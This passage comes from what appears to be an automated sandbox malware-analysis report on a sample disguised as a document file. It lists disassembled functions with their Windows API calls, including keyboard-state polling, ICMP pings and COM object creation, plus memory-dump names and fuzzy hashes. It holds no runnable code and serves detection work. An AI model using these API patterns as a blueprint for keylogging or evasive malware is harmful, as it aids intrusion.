                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                        • String ID:
                                                        • API String ID: 4176008265-0
                                                        • Opcode ID: 4c7d7fdeaa8a9998c2e4852425ee9dcef8159b4c50dc4e9f9cda77134c32f697
                                                        • Instruction ID: 46e8775d1f695b8560566b0fcc8a9a1f6b57b1cf30445c8432330d50c2b3b6e0
                                                        • Opcode Fuzzy Hash: 4c7d7fdeaa8a9998c2e4852425ee9dcef8159b4c50dc4e9f9cda77134c32f697
                                                        • Instruction Fuzzy Hash: DE61D370900649EFDF11DFA4C8A8AEE7BB9EB01315F14415AFC41A7251D7BDAD09CB60
                                                        Function 00779A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00779AA5
                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00779AA8
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00779ACC
                                                        • _memset.LIBCMT ref: 00779ADD
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00779AEF
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00779B67
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow_memset
                                                        • String ID:
                                                        • API String ID: 830647256-0
                                                        • Opcode ID: 9c79779d0b8eac7f32d6fcf43ab3ab59846ca4e626f797dda0c6e4fb4d9d45d7
                                                        • Instruction ID: 6388608160c672739834cf95bcfd4205e8281e589ca7ee3a7d866c561e9a69d2
                                                        • Opcode Fuzzy Hash: 9c79779d0b8eac7f32d6fcf43ab3ab59846ca4e626f797dda0c6e4fb4d9d45d7
                                                        • Instruction Fuzzy Hash: 4D616F71900208AFDF11DFA8CC81EEE77B8AF09750F108156FA19A72A2D778AD41DB54
                                                        Function 00753569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00753591
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00753612
                                                        • GetKeyState.USER32(000000A0), ref: 0075362D
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00753647
                                                        • GetKeyState.USER32(000000A1), ref: 0075365C
                                                        • GetAsyncKeyState.USER32(00000011), ref: 00753674
                                                        • GetKeyState.USER32(00000011), ref: 00753686
                                                        • GetAsyncKeyState.USER32(00000012), ref: 0075369E
                                                        • GetKeyState.USER32(00000012), ref: 007536B0
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 007536C8
                                                        • GetKeyState.USER32(0000005B), ref: 007536DA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: 1cf4ce6bb322a8d11c628e863908583e61dfcf7d109bb294b07bf933d8d48ca4
                                                        • Instruction ID: 89fb31c31d168090028c8cbf146f5578b9c9c6edd406ec56d2b8ee1d53eaf6f1
                                                        • Opcode Fuzzy Hash: 1cf4ce6bb322a8d11c628e863908583e61dfcf7d109bb294b07bf933d8d48ca4
                                                        • Instruction Fuzzy Hash: E14194605047C97DFF31976488243E5BAA0AB113C5F04805EDDC6462D2EBEC9FDC8B66
                                                        Function 0074A28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 0074A2AA
                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 0074A2F5
                                                        • VariantInit.OLEAUT32(?), ref: 0074A307
                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 0074A327
                                                        • VariantCopy.OLEAUT32(?,?), ref: 0074A36A
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 0074A37E
                                                        • VariantClear.OLEAUT32(?), ref: 0074A393
                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 0074A3A0
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0074A3A9
                                                        • VariantClear.OLEAUT32(?), ref: 0074A3BB
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0074A3C6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                        • String ID:
                                                        • API String ID: 2706829360-0
                                                        • Opcode ID: 5fc21dd1d30f17b475476c87e0babf6292e2d6e3ed82552de0a091ec96f4c16c
                                                        • Instruction ID: 572774dc9e59cbafd51086a553d2b91736288b0d29feabd6ad5198ef9aa488cc
                                                        • Opcode Fuzzy Hash: 5fc21dd1d30f17b475476c87e0babf6292e2d6e3ed82552de0a091ec96f4c16c
                                                        • Instruction Fuzzy Hash: 29415D31900219FFCB10DFA4DC889DEBBB9FF48354F108065E901A3261DB78AA46CBA1
                                                        Function 0076B250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
                                                          • Part of subcall function 007184A6: __itow.LIBCMT ref: 00718519
                                                        • CoInitialize.OLE32 ref: 0076B298
                                                        • CoUninitialize.COMBASE ref: 0076B2A3
                                                        • CoCreateInstance.COMBASE(?,00000000,00000017,0079D8FC,?), ref: 0076B303
                                                        • IIDFromString.COMBASE(?,?), ref: 0076B376
                                                        • VariantInit.OLEAUT32(?), ref: 0076B410
                                                        • VariantClear.OLEAUT32(?), ref: 0076B471
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                        • API String ID: 834269672-1287834457
                                                        • Opcode ID: 71b0a929df3eeae927557c4d474bcd593be3799f30953a5d985adbd203b79969
                                                        • Instruction ID: 550c66b964f6da9b0dff1d46325e244f94d5a8999d05fc9ac1c2bf2794f6d2c6
                                                        • Opcode Fuzzy Hash: 71b0a929df3eeae927557c4d474bcd593be3799f30953a5d985adbd203b79969
                                                        • Instruction Fuzzy Hash: 30617D712043119FC710DF55C889B6AB7E8EF89714F04441DF986DB292DB78ED85CB92
                                                        Function 00768694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WSAStartup.WS2_32(00000101,?), ref: 007686F5
                                                        • inet_addr.WS2_32(?), ref: 0076873A
                                                        • gethostbyname.WS2_32(?), ref: 00768746
                                                        • IcmpCreateFile.IPHLPAPI ref: 00768754
                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007687C4
                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007687DA
                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 0076884F
                                                        • WSACleanup.WS2_32 ref: 00768855
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                        • String ID: Ping
                                                        • API String ID: 1028309954-2246546115
                                                        • Opcode ID: 92731a353179fa0e747f77afdfb0aaa9747f423a9f8a4b5226d7ee62b001c994
                                                        • Instruction ID: 12d572c4bbf2a9626ef9b10cd7ed7d40da986c0ba0dfe63413de7e3699aa8f43
                                                        • Opcode Fuzzy Hash: 92731a353179fa0e747f77afdfb0aaa9747f423a9f8a4b5226d7ee62b001c994
                                                        • Instruction Fuzzy Hash: B751B431604201DFD761DF64CC49B6A77E4EF48720F14892AF996D72A1DB78EC41CB42
                                                        Function 00779C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00779C68
                                                        • CreateMenu.USER32 ref: 00779C83
                                                        • SetMenu.USER32(?,00000000), ref: 00779C92
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00779D1F
                                                        • IsMenu.USER32(?), ref: 00779D35
                                                        • CreatePopupMenu.USER32 ref: 00779D3F
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00779D70
                                                        • DrawMenuBar.USER32 ref: 00779D7E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                        • String ID: 0
                                                        • API String ID: 176399719-4108050209
                                                        • Opcode ID: c3a949255b6e141888be710cd62bd335771d78a18de8b7838fb26f2f6d9db52f
                                                        • Instruction ID: c062281592cc3d17c5b0162dc6f078c288df3182a7425e044267e3280602d61c
                                                        • Opcode Fuzzy Hash: c3a949255b6e141888be710cd62bd335771d78a18de8b7838fb26f2f6d9db52f
                                                        • Instruction Fuzzy Hash: 3B415575A01209EFDF20EFA4D844BDABBB5FF49354F148029EA4997351D738A910DB60
                                                        Function 0075EC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0075EC1E
                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0075EC94
                                                        • GetLastError.KERNEL32 ref: 0075EC9E
                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 0075ED0B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                        • API String ID: 4194297153-14809454
                                                        • Opcode ID: cc9144a1ce8c8cac673d6b8264f2afe3ea3cec6d7d709695769f8dc50c7c8bad
                                                        • Instruction ID: e93e87b7202323afa9dceedb533444bc9829616a59d2ce62607da7014384803b
                                                        • Opcode Fuzzy Hash: cc9144a1ce8c8cac673d6b8264f2afe3ea3cec6d7d709695769f8dc50c7c8bad
                                                        • Instruction Fuzzy Hash: 3231C335A00209DFC715EF68C949EEE77B4EF44702F10801AE906D72D1DAB8DE86CBA1
                                                        Function 0074C6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0074C782
                                                        • GetDlgCtrlID.USER32 ref: 0074C78D
                                                        • GetParent.USER32 ref: 0074C7A9
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0074C7AC
                                                        • GetDlgCtrlID.USER32(?), ref: 0074C7B5
                                                        • GetParent.USER32(?), ref: 0074C7D1
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0074C7D4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 313823418-1403004172
                                                        • Opcode ID: 34566f517979c770e83bffb638fc5772c3f3bb2401d6a7ba322fd4aee309f2b5
                                                        • Instruction ID: 46fd7a508cafc0b47184e7868442dbc59da54aa5fa6e48b82d126442bc8ab140
                                                        • Opcode Fuzzy Hash: 34566f517979c770e83bffb638fc5772c3f3bb2401d6a7ba322fd4aee309f2b5
                                                        • Instruction Fuzzy Hash: E721AE74900208AFCB06EBA4CC85EFEB775AB45310F508116F562932E1DB7C9856EA20
                                                        Function 0074C7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0074C869
                                                        • GetDlgCtrlID.USER32 ref: 0074C874
                                                        • GetParent.USER32 ref: 0074C890
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0074C893
                                                        • GetDlgCtrlID.USER32(?), ref: 0074C89C
                                                        • GetParent.USER32(?), ref: 0074C8B8
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0074C8BB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 313823418-1403004172
                                                        • Opcode ID: 4d963fb45c2b10ca4f9e7dc11c41fb16ad47baf41ddc0f6546609cd9ace9c622
                                                        • Instruction ID: dfac57e5fe12d2656a15f92d61c8af61700bcef8405bbfa71f046a95ad896365
                                                        • Opcode Fuzzy Hash: 4d963fb45c2b10ca4f9e7dc11c41fb16ad47baf41ddc0f6546609cd9ace9c622
                                                        • Instruction Fuzzy Hash: 49219D71A01208AFDB06AFA4CC89EFEBB79AF45300F508016F551A31D2DB7D9856EB60
                                                        Function 0074C8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32 ref: 0074C8D9
                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 0074C8EE
                                                        • _wcscmp.LIBCMT ref: 0074C900
                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0074C97B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                        • API String ID: 1704125052-3381328864
                                                        • Opcode ID: e1c10429852ec6bb895d640e28f524c4ebab9209c6047c7b9e90e46d1a8f7758
                                                        • Instruction ID: 522b3efbdb212d5cdb1110561f9a55e05d3b9fd2f00cf9fa1f950e72d2d66104
                                                        • Opcode Fuzzy Hash: e1c10429852ec6bb895d640e28f524c4ebab9209c6047c7b9e90e46d1a8f7758
                                                        • Instruction Fuzzy Hash: 1911ACF7649702FAF6552A30DC0BDA6B7ACDB06764F20401AF900A50D3FBAD7D129554
                                                        Function 0076B74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 0076B777
                                                        • CoInitialize.OLE32(00000000), ref: 0076B7A4
                                                        • CoUninitialize.COMBASE ref: 0076B7AE
                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 0076B8AE
                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 0076B9DB
                                                        • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 0076BA0F
                                                        • CoGetObject.OLE32(?,00000000,0079D91C,?), ref: 0076BA32
                                                        • SetErrorMode.KERNEL32(00000000), ref: 0076BA45
                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0076BAC5
                                                        • VariantClear.OLEAUT32(0079D91C), ref: 0076BAD5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                        • String ID:
                                                        • API String ID: 2395222682-0
                                                        • Opcode ID: a20b77c86dc94f0a080030c3c4ad90a9a5cc3bd929d79aa3d1ad9d0b5fd520a5
                                                        • Instruction ID: c3ed6785094542911c0daae75b1352a314ca3907558a5366092b2eaa106a2bfb
                                                        • Opcode Fuzzy Hash: a20b77c86dc94f0a080030c3c4ad90a9a5cc3bd929d79aa3d1ad9d0b5fd520a5
                                                        • Instruction Fuzzy Hash: A4C102B1608305AFC700DF68C88896AB7E9FF89314F00491DF98ADB251DB79ED45CB92
                                                        Function 0075B05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0075B137
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ArraySafeVartype
                                                        • String ID:
                                                        • API String ID: 1725837607-0
                                                        • Opcode ID: 48259a40c4ad537c79c9bd854c69afba4685eed1325ce8f2bc33d976c179983e
                                                        • Instruction ID: 56b4bbdfb81617789b22691e2c9f69f676d1f2f04d62d9a399f5cbcdb86ba412
                                                        • Opcode Fuzzy Hash: 48259a40c4ad537c79c9bd854c69afba4685eed1325ce8f2bc33d976c179983e
                                                        • Instruction Fuzzy Hash: 05C18175A0021ADFDB00CF98D485BFEB7B4FF08316F20406AEA15E7251C7B8A949CB95
                                                        Function 0073BA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __lock.LIBCMT ref: 0073BA74
                                                          • Part of subcall function 00738984: __mtinitlocknum.LIBCMT ref: 00738996
